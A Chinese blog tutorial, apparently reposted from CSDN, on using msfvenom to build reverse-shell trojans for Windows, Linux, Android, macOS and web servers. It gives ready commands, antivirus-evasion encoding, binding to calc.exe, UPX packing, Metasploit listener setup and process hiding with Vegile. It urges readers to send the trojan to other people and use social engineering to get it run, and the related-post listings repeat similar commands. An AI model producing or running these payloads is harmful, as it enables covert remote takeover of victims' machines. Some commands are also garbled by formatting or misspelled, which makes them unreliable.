Msfvenonm生成后门

最新推荐文章于 2024-04-24 09:45:11 发布
最新推荐文章于 2024-04-24 09:45:11 发布
阅读量2k 收藏 4
点赞数 1
分类专栏: 工具的使用
原文链接:https://blog.csdn.net/qq_36119192/article/details/83869141
版权

目录

Msfvenom

生成exe木马

生成Linux木马

方法一:

方法二:

在前一篇文章中我讲了什么是Meterpreter,并且讲解了Meterpreter的用法。传送门——>Metasploit之Meterpreter

今天我要讲的是我们用Msfvenom制作一个木马,发送给其他主机,只要其他主机运行了该木马,就会自动连接到我们的主机,并且建立一条TCP连接。我们可以通过这条TCP连接控制目标主机。

Msfvenom

  • –p (- -payload-options):添加载荷payload。载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT,就可以生成对应语言,对应平台的后门了!!!
  • –l:查看所有payload encoder nops。
  • –f :输出文件格式。
  • –e:编码免杀。
  • –a:选择架构平台  x86 | x64 | x86_64
  • –o:文件输出
  • –s:生成payload的最大长度,就是文件大小。
  • –b:避免使用的字符 例如:不使用 ‘\0f’。
  • –i:编码次数。
  • –c:添加自己的shellcode
  • –x | -k:捆绑


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     安卓
     
     app:
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     msfvenom -p android
     
     /meterpreter/reverse_tcp LHOST=
     
     192.168
     
     .10
     
     .27 LPORT=
     
     8888 -o 
     
     ~/Desktop/test2.apk  
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Linux:
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     msfvenom -p linux
     
     /x86/meterpreter/reverse_tcp LHOST=
     
     192.168
     
     .10
     
     .27 LPORT=
     
     8888 -f  elf > shell.elf
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Mac:
    
    
    
   
   
  6. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     msfvenom -p osx
     
     /x86/shell_reverse_tcp LHOST=
     
     192.168
     
     .10
     
     .27 LPORT=
     
     8888 -f macho >  shell.macho
    
    
    
   
   
  7. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     PHP:
    
    
    
   
   
  8. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     msfvenom -p php
     
     /meterpreter/reverse_tcp LHOST=
     
     192.168
     
     .20
     
     .27 LPORT=
     
     4444 -f raw -o test.php
    
    
    
   
   
  9. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ASP:
    
    
    
   
   
  10. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     msfvenom -p windows
     
     /meterpreter/reverse_tcp LHOST=
     
     192.168
     
     .10
     
     .27 LPORT=
     
     8888  -f asp > shell.asp
    
    
    
   
   
  11. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ASPX:
    
    
    
   
   
  12. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     msfvenom -p windows
     
     /meterpreter/reverse_tcp LHOST=
     
     192.168
     
     .10
     
     .27 LPORT=
     
     8888  -f  aspx > shell.aspx
    
    
    
   
   
  13. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     JSP:
    
    
    
   
   
  14. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     msfvenom -p java/jsp_shell_reverse_tcp LHOST=
     
     192.168
     
     .10
     
     .27 LPORT=
     
     8888 -f  raw > shell.jsp
    
    
    
   
   
  15. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Bash:
    
    
    
   
   
  16. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     msfvenom -p cmd
     
     /unix/reverse_bash LHOST=
     
     192.168
     
     .10
     
     .27 LPORT=
     
     8888 -f   raw > shell.sh
    
    
    
   
   
  17. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Perl
    
    
    
   
   
  18. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     msfvenom -p cmd
     
     /unix/reverse_perl LHOST=
     
     192.168
     
     .10
     
     .27 LPORT=
     
     8888 -f raw > shell.pl
    
    
    
   
   
  19. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Python
    
    
    
   
   
  20. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     msfvenom -p python
     
     /meterpreter/reverser_tcp LHOST=
     
     192.168
     
     .10
     
     .27 LPORT=
     
     8888 -f   raw > shell.py

生成exe木马


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     msfvenom -p windows/meterpreter/reverse_tcp lhost=
     
     192.168
     
     .10
     
     .27 lport=
     
     8888 -f exe -o test.exe  
     
     #lhost是我们的主机ip,lport是我们主机的用于监听的端口
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     msfvenom -p windows/meterpreter/reverse_tcp lhost=
     
     192.168
     
     .10
     
     .27 lport=
     
     8888 -i 
     
     3 -e x86/shikata_ga_nai  -f exe -o test.exe  
     
     #编码3次

然后会在该目录下生成一个test.exe的木马。

msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp -e x86/shikata_ga_nai -i 20 lhost=192.168.10.11 lport=8888 -x calc.exe -f exe -o test.exe      #编码20次、捆绑正常的32位calc.exe,生成32位的test.exe文件

利用 upx 加壳

upx -9 test.exe -k -o test2.exe

接下来,我们运行 msfconsole 进入MSF控制台,然后输入以下命令


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     msf > use exploit/multi/handler  
     
     #使用exploit/multi/handler监听从肉鸡发来的数据
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     msf exploit(handler) > set payload windows/meterpreter/reverse_tcp  
     
     #设置payload,不同的木马设置不同的payload
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     msf exploit(handler) > set lhost 
     
     192.168
     
     .10
     
     .15  
     
     #我们的主机ip
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     msf exploit(handler) > set lport 
     
     8888            
     
     #我们的主机端口
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     msf exploit(handler) > exploit

然后,将木马发送给其他人,无论使用什么手段(可以使用社会工程学)让其在其他主机上运行,我们这边就会接收到反弹过来的session。

因为我们刚刚把进程挂在后台,所以我们输入:sessions  -l  可以查看到我们得到的shell,使用 sessions -i  1 可以进入指定的shell,我们这里只有一个,所以id为1。如图,我们成功拿到了其他主机的shell

生成Linux木马

方法一:

执行以下命令会生成一个elf文件


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     #生成32位的马
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=VPS的地址  LPORT=
     
     8888 -f elf > test.elf
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     #生成64位的马
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=VPS的地址  LPORT=
     
     8888 -f elf > test.elf

然后MSF开启监听


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     use exploit/multi/handler
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     set payload linux/x64/meterpreter/reverse_tcp
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     set 
     
     LHOST 
     
     0.0.
     
     0.0
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     set 
     
     LPORT 
     
     8888
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     exploit -j

 

将该elf文件上传到目标机器,添加可执行权限,然后执行即可

方法二:

首先,在我们的Kali上生成一个Linux类型的木马test

msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=VPS的地址 LPORT=8888 -b "\x00" -f elf -o test

在目标机器上下载Vegile,命令如下,然后将 test 传到Vegile目录下


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     git 
     
     clone https://github.com/Screetsec/Vegile.git
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     cd 
     
     Vegile
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     chmod 
     
     +x Vegile

 

在Kali上开启监听如下


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     use 
     
     exploit/multi/hander
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     set 
     
     payload linux/x86/shell/reverse_tcp
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     set 
     
     lhost 192.168.10.13
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     set 
     
     lport 8888
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     exploit 
     
     -j

然后在目标及执行如下


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ./Vegile 
     
     --u test
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ./Vegile 
     
     --i test

然后我们的VPS就可以收到目标机器弹回来的shell了。

关于后渗透阶段如何使用Meterpreter,传送门——>后渗透阶段Meterpreter的使用

Mamba start
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
超级Shift后门生成
11-27
【超级Shift后门生成器】是一款特殊的工具,主要用于创建隐蔽的后门程序,它允许远程访问和控制目标计算机系统。这个工具的名称“超级Shift”可能暗示了它在功能上比常规的后门生成器更加强大和复杂,可能是通过键盘...
shift后门生成
12-07
shift后门生成器 这个东西我个人觉得是很好用的.. 网上有写shift后门密码直接就能破解. 这个还行..
kali使用msf简单制作木马
m0_53820621的博客
11-15 1万+
命令: 废话不多说,直接上命令: msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.10.166 lport=4444 -f exe -o /root/csdn.exe 命令分解: msfvenom #使用msfmsfvenom模块 -a #指定架构(x86指32位,x64为64位,建议x86,因为x64兼容x86,在不知道目标机架构的情况下x86更为合适) -p #指定p
MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位
热门推荐
linxaiomo
02-20 1万+
漏洞复现:MS17-010 漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口) 2.关闭防火墙 靶机:windows 7(未知X32位还是X64位) ip:192.168.1.9 攻击机:kali linux (X64) ip:192.168.1.101 使用工具:meatsploit,nmap 前期准备工作:由于kali是64位,如果windows 7 是32 位,所以我们得安装wine3...
Msfvenom生成木马实验
最新发布
m0_74025111的博客
04-24 813
编码处理型:msfvenom -p <payload> <payload options> -a <arch> --platform <platform> -e <encoder option> -i <encoder times> -b <bad-chars> -n <nopsled> -f <format> -o <path>/root/Desktop /putty.exe -k -f exe -o /tmp/putty_evil.exe生成伪装木马,将payload。
kali-msfconsole:演示-浏览器缓冲区溢出攻击
xianjie0318的博客
12-10 1910
测试机:windows7 32位 测试步骤: 准备Win7-X86并安装Flash18 如果安装提示不是最新版本,需要去注册表-删除HKEY—LOCAL—MACHINE\SOFTWARE\Macromedia\flashplayer\safeversions 中18以及以上的版本 安装后运行命令msfconsole msf5 > use exploit/multi/browser/adobe_flash_opaque_background_uaf [*] No payload configure.
使用msfconsole常见问题解决
Amdy_amdy的博客
08-23 1万+
问题总结: (其中有我遇到的问题,有我没有遇到的,但我这里总结了一下别人遇到的,未雨绸缪)问题一(这个我也遇到过,不过我安装了上面的win 32就没问题了):原因:这个因为没有/root/.wine目录,执行以下命令即可创建该目录 wine cmd.exe 问题二(我没有遇到):原因:wine在使用过程中会出现图形化界面,这就需要这个基于Mozilla的Gecko渲染引擎来呈现,手动安装所需版本的wine-gecko即可。我们首先下载Wine提供的MSI二进制文件,请注意下载32位版本的,因为我
msfconsole基础命令
weixin_49071539的博客
12-18 1304
生成反弹木马命令 msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.146 lport=55555 R > /home/111.apk 生成一个木马程序111.exe,没有添加任何免杀,很容易被安全软件检测出,这里先介绍一下参数信息 -a 设置目标的指令集架构,x86=32位 x64=64位 –platform 设置目标平台,这里是windows,可以通过–help-platforms选项查看msfvenom支持的所有平台 ,也
RAMIN后门生成
10-26
RAMIN后门生成器RAMIN后门生成器RAMIN后门生成器RAMIN后门生成器RAMIN后门生成器RAMIN后门生成器RAMIN后门生成器RAMIN后门生成器RAMIN后门生成器RAMIN后门生成器RAMIN后门生成器RAMIN后门生成器RAMIN后门生成
SHIFT后门生成
03-29
相信大家都会用 生成后 点生成的软件 然后密码登录 可以进行cmd 用着还可以 希望大家去下载试试
Metasploit可执行后门.doc
12-01
Metasploit提供了多种方式来生成可执行后门,例如使用msfvenom工具生成可执行文件。下面是一个生成可执行后门的示例命令: `msfvenom -p windows/meterpreter/reverse_...
msfvenom & msfconsole——msfvenom生成木马入侵WinServer2008及Android手机
Ho1aAs‘s Blog
07-29 6114
文章目录一、使用环境二、msfvenom编写Trojan木马Ⅰ、电脑端.exe格式Ⅱ、移动端.apk格式三、msfconsole控制感染对象Ⅰ、电脑端示例:`shell`获取Windows的CMDⅡ、移动端示例:`webcam_stream`获取Android摄像头实时画面完 免责声明:本文章仅供网络安全方面学习、交流使用,任何操作与作者无关 请遵守我国法律法规 一、使用环境 VMware V15.5.0 Kali-Linux-2020.2 msfconsole msfvenom Windows Se
MSF生成后门木马
一醉一休的博客
11-19 2346
为了方便平时使用,记录一下操作命令
MSF生成后门(制作各种shellcode攻击)
tmzy1的博客
03-09 624
msfpayload,msfencode的结合体,可利用msfvenom生成后门(木马)程序,并在目标机上执行,在本地监听上线。进入msf命令:msconsole再执行msfvenom -h可得到命令帮助。
渗透工具——kali中msf后门生成模块msfvenom)
2301_78006725的博客
09-02 694
3. 通过邮件等方式上传到目标电脑,让目标电脑点击这个木马时,木马会在目标电脑后台运行(我这里就先用本机做一下试验)5. 然后run运行,同时点击桌面上的exe文件(不会出现画面,后进入后台运行)然后use exploit/multi/handler。成功拿到会话,就证明木马没问题,就可以进行操作啦!2. 点击文件管理,在root中查看是否已经生成完毕。show options完善信息。列出所有可用的payload;1. 生成shell。
msf的实战使用——msfvenom
tomyyyyy
05-11 2877
msf的实战使用——msfvenom 文章目录msf的实战使用——msfvenommsfvenom命令的参数常用命令木马免杀姿势1:Py2exe生成exe姿势2:PyInstaller生成exe姿势3:编译c源码 msfvenom命令的参数 Options: -l, --list <type> # 列出所有可用的项目,其中值可以被设置为 payloads, encoders, nops, platforms, archs, encrypt,
msf生成免杀木马
qq_56426046的博客
09-08 5442
1.修改特征码免杀的最基本思想就是破坏特征,这个特征有可能是特征码,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。(特征码:能识别一个程序是病毒的一段不大于64字节的特征串)就目前的反病毒技术来讲,更改特征码从而达到免杀的效果事实上包含着两种方式。一种是改特征码,这也是免杀的最初方法。例如一个文件在某一个地址内有“灰鸽子上线成功!”这么一句话,表明它就是木马,只要将相应地址内的那句话改成别的就可以了,如果是无关痛痒的,直接将其删掉也未尝不可。
msf渗透练习-php后门反弹
weixin_49349476的博客
06-09 2522
php后门反弹,就是通过php的后门文件,对目标进行操控。本次使用msf完成(仅供学习)
msfvenom生成后门程序及利用
good good study
04-08 7153
msfvenom
msfvenonm生成后门木马
07-25
您可以使用msfvenom工具来生成后门木马。msfvenom是Metasploit框架的一部分,它可以用于生成各种类型的恶意软件,包括后门木马。 下面是一个使用msfvenom生成后门木马的示例命令: ``` msfvenom -p windows/...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值